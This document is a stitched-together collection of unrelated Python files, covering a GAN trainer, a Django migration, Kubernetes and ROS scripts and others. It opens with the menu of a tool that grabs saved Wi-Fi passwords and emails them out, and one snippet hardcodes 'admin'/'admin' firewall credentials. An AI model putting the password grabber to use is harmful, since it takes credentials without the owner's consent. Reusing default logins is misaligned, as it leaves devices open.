print("Please wait.......Starting Mail server")
time.sleep(2)
if(os.path.isfile('Passcode.txt')):
mailsender()
else:
passwords()
mailsender()
elif choice.upper() == 'H' or choice.upper() == 'HELP':
clear()
sys.stdout.write(RED+'''\n\t-----------------------------MANUAL-----------------------------\n
Command \t\t\t\tDetails\n'''+MAGENTA+'''
h'''+BLUE+''' \t\t\tOpens Manual Page\n'''+MAGENTA+'''
m'''+BLUE+''' \t\t\tSends Wi-Fi Passwords to Your E-Mail\n'''+MAGENTA+'''
g'''+BLUE+''' \t\t\tGrabs Wi-Fi Passwords\n'''+MAGENTA+'''
q'''+BLUE+''' \t\t\tQuits This Application\n'''+MAGENTA+'''
help'''+BLUE+'''\t\t\tOpens Manual Page\n'''+MAGENTA+'''
mail'''+BLUE+'''\t\t\tSends Wi-Fi Passwords to Your E-Mail\n'''+MAGENTA+'''
grab'''+BLUE+'''\t\t\tGrabs Wi-Fi Passwords\n'''+MAGENTA+'''
quit'''+BLUE+'''\t\t\tQuits This Application\n'''+RED+'''
------------------------------******------------------------------\n''')
else:
print("No Command Found. Please Enter the Valid Command\n")
if __name__ == "__main__":
main()
|
class Solution:
def reverse(self, x: 'int') -> 'int':
negative_flag = False
if x < 0:
x *= -1
negative_flag = True
num_str = str(x)
s = list(num_str)
s.reverse()
reversed_int = int(''.join(s))
if negative_flag:
result = -1 * reversed_int
else:
result = reversed_int
if -1 * 2**31 <= result < 2 ** 31:
return result
else:
return 0
s = Solution()
print(s.reverse(123))
print(s.reverse(-123))
print(s.reverse(120))
print(s.reverse(-120))
print(s.reverse(123456789999))
|
# encoding:utf-8
import os
import torch
import torch.nn.functional as F
import torch.optim as optim
import torchvision
from torchvision import transforms as T
from torchvision.datasets import ImageFolder
from torch.autograd import Variable
from torch.utils.data import DataLoader
from models.discriminator import Discriminator
from models.generator import Generator
import time
import visdom
class ModuleTrain:
def __init__(self, opt, best_loss=0.2):
self.opt = opt
self.best_loss = best_loss # 正确率这个值,才会保存模型
self.netd = Discriminator(self.opt)
self.netg = Generator(self.opt)
self.use_gpu = False
# 加载模型
if os.path.exists(self.opt.netd_path):
self.load_netd(self.opt.netd_path)
else:
print('[Load model] error: %s not exist !!!' % self.opt.netd_path)
if os.path.exists(self.opt.netg_path):
self.load_netg(self.opt.netg_path)
else:
print('[Load model] error: %s not exist !!!' % self.opt.netg_path)
# DataLoader初始化
self.transform_train = T.Compose([
T.Resize((self.opt.img_size, self.opt.img_size)),
T.ToTensor(),
T.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5]),
])
train_dataset = ImageFolder(root=self.opt.data_path, transform=self.transform_train)
self.train_loader = DataLoader(dataset=train_dataset, batch_size=self.opt.batch_size, shuffle=True,
num_workers=self.opt.num_workers, drop_last=True)
# 优化器和损失函数
# self.optimizer = optim.SGD(self.model.parameters(), lr=self.lr, momentum=0.5)
self.optimizer_g = optim.Adam(self.netg.parameters(), lr=self.opt.lr1, betas=(self.opt.beta1, 0.999))
self.optimizer_d = optim.Adam(self.netd.parameters(), lr=self.opt.lr2, betas=(self.opt.beta1, 0.999))
self.criterion = torch.nn.BCELoss()
self.true_labels = Variable(torch.ones(self.opt.batch_size))
self.fake_labels = Variable(torch.zeros(self.opt.batch_size))
self.fix_noises = Variable(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1))
self.noises = Variable(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1))
# gpu or cpu
if self.opt.use_gpu and torch.cuda.is_available():
self.use_gpu = True
else:
self.use_gpu = False
if self.use_gpu:
print('[use gpu] ...')
self.netd.cuda()
self.netg.cuda()
self.criterion.cuda()
self.true_labels = self.true_labels.cuda()
self.fake_labels = self.fake_labels.cuda()
self.fix_noises = self.fix_noises.cuda()
self.noises = self.noises.cuda()
else:
print('[use cpu] ...')
pass
def train(self, save_best=True):
print('[train] epoch: %d' % self.opt.max_epoch)
for epoch_i in range(self.opt.max_epoch):
loss_netd = 0.0
loss_netg = 0.0
correct = 0
print('================================================')
for ii, (img, target) in enumerate(self.train_loader): # 训练
real_img = Variable(img)
if self.opt.use_gpu:
real_img = real_img.cuda()
# 训练判别器
if (ii + 1) % self.opt.d_every == 0:
self.optimizer_d.zero_grad()
# 尽可能把真图片判别为1
output = self.netd(real_img)
error_d_real = self.criterion(output, self.true_labels)
error_d_real.backward()
# 尽可能把假图片判别为0
self.noises.data.copy_(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1))
fake_img = self.netg(self.noises).detach() # 根据噪声生成假图
fake_output = self.netd(fake_img)
error_d_fake = self.criterion(fake_output, self.fake_labels)
error_d_fake.backward()
self.optimizer_d.step()
loss_netd += (error_d_real.item() + error_d_fake.item())
# 训练生成器
if (ii + 1) % self.opt.g_every == 0:
self.optimizer_g.zero_grad()
self.noises.data.copy_(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1))
fake_img = self.netg(self.noises)
fake_output = self.netd(fake_img)
# 尽可能让判别器把假图片也判别为1
error_g = self.criterion(fake_output, self.true_labels)
error_g.backward()
self.optimizer_g.step()
loss_netg += error_g
loss_netd /= (len(self.train_loader) * 2)
loss_netg /= len(self.train_loader)
print('[Train] Epoch: {} \tNetD Loss: {:.6f} \tNetG Loss: {:.6f}'.format(epoch_i, loss_netd, loss_netg))
if save_best is True:
if (loss_netg + loss_netd) / 2 < self.best_loss:
self.best_loss = (loss_netg + loss_netd) / 2
self.save(self.netd, self.opt.best_netd_path) # 保存最好的模型
self.save(self.netg, self.opt.best_netg_path) # 保存最好的模型
print('[save best] ...')
# self.vis()
if (epoch_i + 1) % 5 == 0:
self.image_gan()
self.save(self.netd, self.opt.netd_path) # 保存最好的模型
self.save(self.netg, self.opt.netg_path) # 保存最好的模型
def vis(self):
fix_fake_imgs = self.netg(self.opt.fix_noises)
visdom.images(fix_fake_imgs.data.cpu().numpy()[:64] * 0.5 + 0.5, win='fixfake')
def image_gan(self):
noises = torch.randn(self.opt.gen_search_num, self.opt.nz, 1, 1).normal_(self.opt.gen_mean, self.opt.gen_std)
with torch.no_grad():
noises = Variable(noises)
if self.use_gpu:
noises = noises.cuda()
fake_img = self.netg(noises)
scores = self.netd(fake_img).data
indexs = scores.topk(self.opt.gen_num)[1]
result = list()
for ii in indexs:
result.append(fake_img.data[ii])
torchvision.utils.save_image(torch.stack(result), self.opt.gen_img, normalize=True, range=(-1, 1))
# # print(correct)
# # print(len(self.train_loader.dataset))
# train_loss /= len(self.train_loader)
# acc = float(correct) / float(len(self.train_loader.dataset))
# print('[Train] Epoch: {} \tLoss: {:.6f}\tAcc: {:.6f}\tlr: {}'.format(epoch_i, train_loss, acc, self.lr))
#
# test_acc = self.test()
# if save_best is True:
# if test_acc > self.best_acc:
# self.best_acc = test_acc
# str_list = self.model_file.split('.')
# best_model_file = ""
# for str_index in range(len(str_list)):
# best_model_file = best_model_file + str_list[str_index]
# if str_index == (len(str_list) - 2):
# best_model_file += '_best'
# if str_index != (len(str_list) - 1):
# best_model_file += '.'
# self.save(best_model_file) # 保存最好的模型
#
# self.save(self.model_file)
def test(self):
test_loss = 0.0
correct = 0
time_start = time.time()
# 测试集
for data, target in self.test_loader:
data, target = Variable(data), Variable(target)
if self.use_gpu:
data = data.cuda()
target = target.cuda()
output = self.model(data)
# sum up batch loss
if self.use_gpu:
loss = self.loss(output, target)
else:
loss = self.loss(output, target)
test_loss += loss.item()
predict = torch.argmax(output, 1)
correct += (predict == target).sum().data
time_end = time.time()
time_avg = float(time_end - time_start) / float(len(self.test_loader.dataset))
test_loss /= len(self.test_loader)
acc = float(correct) / float(len(self.test_loader.dataset))
print('[Test] set: Test loss: {:.6f}\t Acc: {:.6f}\t time: {:.6f} \n'.format(test_loss, acc, time_avg))
return acc
def load_netd(self, name):
print('[Load model netd] %s ...' % name)
self.netd.load_state_dict(torch.load(name))
def load_netg(self, name):
print('[Load model netg] %s ...' % name)
self.netg.load_state_dict(torch.load(name))
def save(self, model, name):
print('[Save model] %s ...' % name)
torch.save(model.state_dict(), name)
# self.model.save(name)
|
asa_login = {
'host': "192.168.20.17",
"username": "admin",
"password": "admin"
}
|
# Databricks notebook source
# MAGIC %md
# MAGIC ### Query variant database
# MAGIC
# MAGIC 1. point query of specific variants
# MAGIC 2. range query of specific gene
# COMMAND ----------
import pyspark.sql.functions as fx
# COMMAND ----------
variants_df = spark.table("variant_db.exploded")
display(variants_df)
# COMMAND ----------
# MAGIC %md
# MAGIC ##### select random genotype
# COMMAND ----------
def get_random_variant(df, seed=0):
"""
returns a random chromosome, start position and sampleId for querying
"""
row = df.sample(False, 0.1, seed=seed).limit(1).collect()
chrom = row[0].contigName
start = row[0].start
sampleId = row[0].sampleId
return chrom, start, sampleId
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Select all columns from row of interest
# COMMAND ----------
chrom, start, sampleId = get_random_variant(variants_df, seed=42)
spark.sql("select * from variant_db.exploded where contigName = '{0}' and start == {1} and sampleId = '{2}'".format(chrom, start, sampleId)).collect()
# COMMAND ----------
# MAGIC %md
# MAGIC ##### only retrieve genotype
# COMMAND ----------
chrom, start, sampleId = get_random_variant(variants_df, seed=84)
spark.sql("select `calls` from variant_db.exploded where contigName = '{0}' and start == {1} and sampleId = '{2}'".format(chrom, start, sampleId)).collect()
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ##### Gene based queries
# COMMAND ----------
# MAGIC %md
# MAGIC ##### persist gene coordinates into memory
# COMMAND ----------
genes = spark.sql("select * from variant_db.annotations")
genes.createOrReplaceTempView("genes")
spark.table("genes").persist()
spark.table("genes").count()
# COMMAND ----------
# MAGIC %md
# MAGIC ##### select random gene to query
# COMMAND ----------
genes_overlap_variants_df = genes.hint("range_join", 10). \
join(variants_df,
(variants_df.contigName == genes.contigName) &
(variants_df.start > genes.start) &
(variants_df.start <= genes.end),
"left_semi")
# COMMAND ----------
def get_random_gene(df, seed=0):
"""
returns a random gene for querying
"""
row = df.sample(False, 0.1, seed=seed).limit(1).collect()
gene = row[0].gene
return gene
# COMMAND ----------
gene = get_random_gene(genes_overlap_variants_df, seed=126)
gene
# COMMAND ----------
# MAGIC %md
# MAGIC ##### query all variants in gene
# COMMAND ----------
def get_gene_coords(df, gene):
coords = df.where(fx.col("gene") == gene).collect()[0]
return coords.contigName, coords.start, coords.end
# COMMAND ----------
sampleId = "532"
chrom, gene_start, gene_end = get_gene_coords(spark.table("genes"), gene)
spark.sql("select * from variant_db.exploded where contigName = '{0}' and start >= {1} and end <= {2} and sampleId = '{3}'".format(chrom, gene_start, gene_end, sampleId)).collect()
# COMMAND ----------
|
# Generated by Django 2.0.6 on 2018-07-17 14:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AuthGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
],
options={
'db_table': 'auth_group',
'managed': False,
},
),
migrations.CreateModel(
name='AuthPermission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('codename', models.CharField(max_length=100)),
],
options={
'db_table': 'auth_permission',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128)),
('last_login', models.DateTimeField(blank=True, null=True)),
('is_superuser', models.IntegerField()),
('username', models.CharField(max_length=150, unique=True)),
('first_name', models.CharField(max_length=30)),
('last_name', models.CharField(max_length=150)),
('email', models.CharField(max_length=254)),
('is_staff', models.IntegerField()),
('is_active', models.IntegerField()),
('date_joined', models.DateTimeField()),
],
options={
'db_table': 'auth_user',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUserGroups',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_user_groups',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUserUserPermissions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_user_user_permissions',
'managed': False,
},
),
migrations.CreateModel(
name='DarkskyCurrentWeather',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('description', models.CharField(blank=True, max_length=40, null=True)),
('temp', models.FloatField(blank=True, null=True)),
('icon', models.CharField(blank=True, max_length=40, null=True)),
('precip_intensity', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'DarkSky_current_weather',
'managed': False,
},
),
migrations.CreateModel(
name='DarkskyHistoricalWeatherData',
fields=[
('time', models.IntegerField(primary_key=True, serialize=False)),
('day_of_week', models.CharField(blank=True, max_length=20, null=True)),
('description', models.CharField(blank=True, max_length=50, null=True)),
('temp', models.FloatField(blank=True, null=True)),
('precip_intensity', models.FloatField(blank=True, null=True)),
('hour', models.IntegerField(blank=True, null=True)),
('month', models.IntegerField(blank=True, null=True)),
('date', models.DateTimeField(blank=True, null=True)),
('year', models.IntegerField(blank=True, null=True)),
('icon', models.CharField(blank=True, max_length=30, null=True)),
],
options={
'db_table': 'DarkSky_historical_weather_data',
'managed': False,
},
),
migrations.CreateModel(
name='DarkskyHourlyWeatherPrediction',
fields=[
('timestamp', models.DateTimeField()),
('time', models.IntegerField(primary_key=True, serialize=False)),
('day_of_week', models.CharField(blank=True, max_length=10, null=True)),
('description', models.CharField(blank=True, max_length=40, null=True)),
('temp', models.FloatField(blank=True, null=True)),
('icon', models.CharField(blank=True, max_length=40, null=True)),
('precip_intensity', models.FloatField(blank=True, null=True)),
('hour', models.IntegerField(blank=True, null=True)),
('month', models.IntegerField(blank=True, null=True)),
('date', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'DarkSky_hourly_weather_prediction',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoAdminLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('action_time', models.DateTimeField()),
('object_id', models.TextField(blank=True, null=True)),
('object_repr', models.CharField(max_length=200)),
('action_flag', models.PositiveSmallIntegerField()),
('change_message', models.TextField()),
],
options={
'db_table': 'django_admin_log',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoContentType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app_label', models.CharField(max_length=100)),
('model', models.CharField(max_length=100)),
],
options={
'db_table': 'django_content_type',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoMigrations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app', models.CharField(max_length=255)),
('name', models.CharField(max_length=255)),
('applied', models.DateTimeField()),
],
options={
'db_table': 'django_migrations',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoSession',
fields=[
('session_key', models.CharField(max_length=40, primary_key=True, serialize=False)),
('session_data', models.TextField()),
('expire_date', models.DateTimeField()),
],
options={
'db_table': 'django_session',
'managed': False,
},
),
migrations.CreateModel(
name='FareStages',
fields=[
('stoppointid', models.IntegerField(primary_key=True, serialize=False)),
('stage', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'fare_stages',
'managed': False,
},
),
migrations.CreateModel(
name='StaticBusData',
fields=[
('long', models.FloatField()),
('lat', models.FloatField()),
('longname', models.CharField(max_length=30)),
('shortname', models.CharField(max_length=30)),
('stoppointid', models.IntegerField(primary_key=True, serialize=False)),
('streetname', models.CharField(max_length=30)),
],
options={
'db_table': 'static_bus_data',
'managed': False,
},
),
migrations.CreateModel(
name='Trips2017',
fields=[
('dayofservice', models.CharField(blank=True, max_length=30, null=True)),
('tripid', models.IntegerField()),
('lineid', models.CharField(blank=True, max_length=10, null=True)),
('routeid', models.CharField(blank=True, max_length=10, null=True)),
('direction', models.IntegerField(blank=True, null=True)),
('plannedtime_arr', models.IntegerField(blank=True, null=True)),
('plannedtime_dep', models.IntegerField(blank=True, null=True)),
('actualtime_arr', models.IntegerField(blank=True, null=True)),
('actualtime_dep', models.IntegerField(blank=True, null=True)),
('suppressed', models.IntegerField(blank=True, null=True)),
('timestamp', models.IntegerField(primary_key=True, serialize=False)),
],
options={
'db_table': 'trips_2017',
'managed': False,
},
),
migrations.CreateModel(
name='Leavetimes2017',
fields=[
('dayofservice', models.CharField(blank=True, max_length=30, null=True)),
('progrnumber', models.IntegerField()),
('stoppointid', models.IntegerField(blank=True, null=True)),
('plannedtime_arr', models.IntegerField(blank=True, null=True)),
('plannedtime_dep', models.IntegerField(blank=True, null=True)),
('actualtime_arr', models.IntegerField(blank=True, null=True)),
('actualtime_dep', models.IntegerField(blank=True, null=True)),
('vehicleid', models.IntegerField(blank=True, null=True)),
('suppressed', models.IntegerField(blank=True, null=True)),
('lastupdate', models.CharField(blank=True, max_length=30, null=True)),
('timestamp', models.ForeignKey(db_column='timestamp', on_delete=django.db.models.deletion.DO_NOTHING, primary_key=True, related_name='timestamp_fk', serialize=False, to='api.Trips2017')),
],
options={
'db_table': 'leavetimes_2017',
'managed': False,
},
),
]
|
# Copyright 2020 Fortinet(c)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Uses watch to print the stream of events from list namespaces and list pods.
The script will wait for 10 events related to namespaces to occur within
the `timeout_seconds` threshold and then move on to wait for another 10 events
related to pods to occur within the `timeout_seconds` threshold..metadata.resource_version
"""
from kubernetes import client, config, watch
import json
import os
from pprint import pprint
def main():
# Configs can be set in Configuration class directly or using helper
# utility. If no argument provided, the config will be loaded from
# default location.
config.load_kube_config()
print("PID : %s" % (os.getpid()))
v1 = client.CoreV1Api()
count = 500
w = watch.Watch()
endpoints = v1.list_endpoints_for_all_namespaces(watch=False)
endp_resversion = endpoints.metadata.resource_version
print (endp_resversion)
for event in w.stream(v1.list_endpoints_for_all_namespaces, field_selector="metadata.namespace!=kube-system", resource_version=endp_resversion, timeout_seconds=10, pretty='true'):
pprint(event)
print("Event: %s %s %s" % (
event['type'], event['object'].metadata.name, event['object'].metadata.annotations))
count -= 1
if not count:
w.stop()
print("Finished endpoints stream.")
##
for event in w.stream(v1.list_service_for_all_namespaces, label_selector="app", timeout_seconds=100):
pprint(event)
print("Event: %s %s %s" % (
event['type'],
event['object'].kind,
json.loads(event['object'].metadata.annotations['kubectl.kubernetes.io/last-applied-configuration'])['metadata'])
)
count -= 1
if not count:
w.stop()
print("Finished pod stream.")
if __name__ == '__main__':
main()
|
"""
Created June 2021
Author: Marco Behrendt
Leibniz Universität Hannover, Germany
University of Liverpool, United Kingdom
https://github.com/marcobehrendt/Projecting-interval-uncertainty-through-the-discrete-Fourier-transform
"""
import numpy
from numpy import (arange, cos, exp, linspace, mean, pi, sin, zeros) # for convenience
from matplotlib import pyplot, cm
# The code in this file should comply to PEP-8: https://realpython.com/python-pep8/
def subplots(figsize=(16,8),size=None): # wrapper of the matplotlib.pyplot figure gen
if size is None:
fig, ax = pyplot.subplots(figsize=figsize)
else:
fig, ax = pyplot.subplots(figsize=figsize,size=size)
return fig,ax
def plot_signal(signal,figsize=(18,6),xlabel=r'#$x$',ylabel=r'$x$',color=None,lw=1,title=None,ax=None,label=None):
x = list(range(len(signal)))
y = signal
if ax is None:
fig = pyplot.figure(figsize=figsize)
ax = fig.subplots()
ax.grid()
ax.plot(x,y,marker='.',color=color,lw=lw,label=label) # https://matplotlib.org/3.1.0/gallery/color/named_colors.html
ax.set_xlabel(xlabel,fontsize=20)
ax.set_ylabel(ylabel,fontsize=20)
ax.tick_params(direction='out', length=6, width=2, labelsize=14)
if title is not None:
ax.set_title(title,fontsize=20)
return None
def jonswap_spectrum(w,alpha,w_p,gamma,sigma1,sigma2):
g = 9.81
N = len(w)
spectrum = numpy.zeros(N)
r = numpy.zeros(N)
for x in range(len(w)):
if w[x] == 0:
spectrum[x] = 0
else:
if w[x] <= w_p:
r[x] = exp(-(w[x]-w_p)**2/(2*sigma1**2*w_p**2))
else:
r[x] = exp(-(w[x]-w_p)**2/(2*sigma2**2*w_p**2))
spectrum[x] = alpha * g**2 / w[x]**5 * exp( -5/4 * (w_p/w[x])**4 ) * gamma**r[x]
return spectrum
def stochastic_process(spectrum, w, t):
Nt = len(t)
Nw = len(w)
dw = w[1] - w[0]
signal = numpy.zeros(Nt)
for w_n in range(Nw):
if w[w_n] == 0:
A = 0
else:
A = (2*spectrum[w_n]*dw)**0.5
phi = 2*pi*numpy.random.random_sample()
signal += 2**0.5 * A * cos(w[w_n] * t + phi)
return signal
def wind_turbine(R,r,h_pile,rho_steel,c,k):
A_steel = (R**2 - r**2)*pi
V_steel = A_steel * h_pile
m_steel = rho_steel * V_steel
w0 = (k/m_steel)**0.5
xi = c/(w0*2*m_steel)
return w0,xi
def frequency_response_interval(w,spectrum,w0,xi):
ai_low=[ai.lo() for ai in spectrum]
ai_high=[ai.hi() for ai in spectrum]
H_low = ai_low * abs(1/(w0**2 - w**2 + 2 * xi * w0*w*1j))**2
H_high = ai_high * abs(1/(w0**2 - w**2 + 2 * xi * w0*w*1j))**2
return H_low,H_high
def frequency_response(w,spectrum,w0,xi):
H = spectrum * abs(1/(w0**2 - w**2 + 2 * xi * w0*w*1j))**2
return H
def periodogram(spectrum,t, dt):
for x in range(len(spectrum)):
spectrum[x] = spectrum[x]**2*dt**2/t[len(t)-1]/(2*pi)
return spectrum
def plot_line(x,y,figsize=(18,6),xlabel=r'#$x$',ylabel='$x$',color=None,lw=1,title=None,ax=None,label=None):
if ax is None:
fig = pyplot.figure(figsize=figsize)
ax = fig.subplots()
ax.grid()
ax.plot(x,y,marker='.',color=color,lw=lw,label=label) # https://matplotlib.org/3.1.0/gallery/color/named_colors.html
ax.set_xlabel(xlabel,fontsize=20)
ax.set_ylabel(ylabel,fontsize=20)
ax.tick_params(direction='out', length=6, width=2, labelsize=14)
if title is not None:
ax.set_title(title,fontsize=20)
return ax
def plot_bounds(x,bounds,color=None,alpha=None,ax=None):
if ax is None:
fig = pyplot.figure(figsize=(18,6))
ax = fig.subplots()
ax.grid()
bounds_low=[ai.lo() for ai in bounds]
bounds_high=[ai.hi() for ai in bounds]
ax.fill_between(x,bounds_low,bounds_high,alpha=alpha,label='Interval',edgecolor='blue',lw=2,color=color)
|
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class FeedResource(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'feed_type': 'str',
'package_acquisition_location_options': 'list[str]',
'space_id': 'str',
'last_modified_on': 'datetime',
'last_modified_by': 'str',
'links': 'dict(str, str)'
}
attribute_map = {
'id': 'Id',
'name': 'Name',
'feed_type': 'FeedType',
'package_acquisition_location_options': 'PackageAcquisitionLocationOptions',
'space_id': 'SpaceId',
'last_modified_on': 'LastModifiedOn',
'last_modified_by': 'LastModifiedBy',
'links': 'Links'
}
def __init__(self, id=None, name=None, feed_type=None, package_acquisition_location_options=None, space_id=None, last_modified_on=None, last_modified_by=None, links=None): # noqa: E501
"""FeedResource - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._feed_type = None
self._package_acquisition_location_options = None
self._space_id = None
self._last_modified_on = None
self._last_modified_by = None
self._links = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if feed_type is not None:
self.feed_type = feed_type
if package_acquisition_location_options is not None:
self.package_acquisition_location_options = package_acquisition_location_options
if space_id is not None:
self.space_id = space_id
if last_modified_on is not None:
self.last_modified_on = last_modified_on
if last_modified_by is not None:
self.last_modified_by = last_modified_by
if links is not None:
self.links = links
@property
def id(self):
"""Gets the id of this FeedResource. # noqa: E501
:return: The id of this FeedResource. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this FeedResource.
:param id: The id of this FeedResource. # noqa: E501
:type: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this FeedResource. # noqa: E501
:return: The name of this FeedResource. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this FeedResource.
:param name: The name of this FeedResource. # noqa: E501
:type: str
"""
self._name = name
@property
def feed_type(self):
"""Gets the feed_type of this FeedResource. # noqa: E501
:return: The feed_type of this FeedResource. # noqa: E501
:rtype: str
"""
return self._feed_type
@feed_type.setter
def feed_type(self, feed_type):
"""Sets the feed_type of this FeedResource.
:param feed_type: The feed_type of this FeedResource. # noqa: E501
:type: str
"""
allowed_values = ["None", "NuGet", "Docker", "Maven", "OctopusProject", "GitHub", "Helm", "AwsElasticContainerRegistry", "BuiltIn"] # noqa: E501
if feed_type not in allowed_values:
raise ValueError(
"Invalid value for `feed_type` ({0}), must be one of {1}" # noqa: E501
.format(feed_type, allowed_values)
)
self._feed_type = feed_type
@property
def package_acquisition_location_options(self):
"""Gets the package_acquisition_location_options of this FeedResource. # noqa: E501
:return: The package_acquisition_location_options of this FeedResource. # noqa: E501
:rtype: list[str]
"""
return self._package_acquisition_location_options
@package_acquisition_location_options.setter
def package_acquisition_location_options(self, package_acquisition_location_options):
"""Sets the package_acquisition_location_options of this FeedResource.
:param package_acquisition_location_options: The package_acquisition_location_options of this FeedResource. # noqa: E501
:type: list[str]
"""
allowed_values = ["Server", "ExecutionTarget", "NotAcquired"] # noqa: E501
if not set(package_acquisition_location_options).issubset(set(allowed_values)):
raise ValueError(
"Invalid values for `package_acquisition_location_options` [{0}], must be a subset of [{1}]" # noqa: E501
.format(", ".join(map(str, set(package_acquisition_location_options) - set(allowed_values))), # noqa: E501
", ".join(map(str, allowed_values)))
)
self._package_acquisition_location_options = package_acquisition_location_options
@property
def space_id(self):
"""Gets the space_id of this FeedResource. # noqa: E501
:return: The space_id of this FeedResource. # noqa: E501
:rtype: str
"""
return self._space_id
@space_id.setter
def space_id(self, space_id):
"""Sets the space_id of this FeedResource.
:param space_id: The space_id of this FeedResource. # noqa: E501
:type: str
"""
self._space_id = space_id
@property
def last_modified_on(self):
"""Gets the last_modified_on of this FeedResource. # noqa: E501
:return: The last_modified_on of this FeedResource. # noqa: E501
:rtype: datetime
"""
return self._last_modified_on
@last_modified_on.setter
def last_modified_on(self, last_modified_on):
"""Sets the last_modified_on of this FeedResource.
:param last_modified_on: The last_modified_on of this FeedResource. # noqa: E501
:type: datetime
"""
self._last_modified_on = last_modified_on
@property
def last_modified_by(self):
"""Gets the last_modified_by of this FeedResource. # noqa: E501
:return: The last_modified_by of this FeedResource. # noqa: E501
:rtype: str
"""
return self._last_modified_by
@last_modified_by.setter
def last_modified_by(self, last_modified_by):
"""Sets the last_modified_by of this FeedResource.
:param last_modified_by: The last_modified_by of this FeedResource. # noqa: E501
:type: str
"""
self._last_modified_by = last_modified_by
@property
def links(self):
"""Gets the links of this FeedResource. # noqa: E501
:return: The links of this FeedResource. # noqa: E501
:rtype: dict(str, str)
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this FeedResource.
:param links: The links of this FeedResource. # noqa: E501
:type: dict(str, str)
"""
self._links = links
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(FeedResource, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FeedResource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
from setuptools import setup
import setuptools
setup(
name='tidytextpy', # 包名字
version='0.0.1', # 包版本
description='将R语言tidytext包移植到Python,可简单调用unnest_tokens、get_sentiments、get_stopwords、bind_tf_idf等函数。', # 简单描述
author='大邓', # 作者
author_email='thunderhit@qq.com', # 邮箱
url='https://github.com/thunderhit/tidytextpy', # 包的主页
packages=setuptools.find_packages(),
package_data = {'': ['dictionary/*.txt','dictionary/*.csv']}, #所有目录下的csv、txt词典文件
python_requires='>=3.5',
license="MIT",
keywords=['tidytext', 'text analysis', 'sentiment', 'sentiment analysis', 'natural language processing', 'R', 'python'],
long_description=open('README.md').read(), # 读取的Readme文档内容
long_description_content_type="text/markdown") # 指定包文档格式为markdown
|
#!/usr/bin/env python3
import board
import busio
import rospy
import adafruit_lsm6ds
from sensor_msgs.msg import Imu
def main():
rospy.init_node('accelerometer', anonymous=False)
pub = rospy.Publisher("imu", Imu, queue_size=10)
rospy.loginfo('MMA8451 3DOF Accelerometer Publishing to IMU')
i2c = busio.I2C(board.SCL, board.SDA)
sensor = adafruit_lsm6ds.LSM6DSOX(i2c)
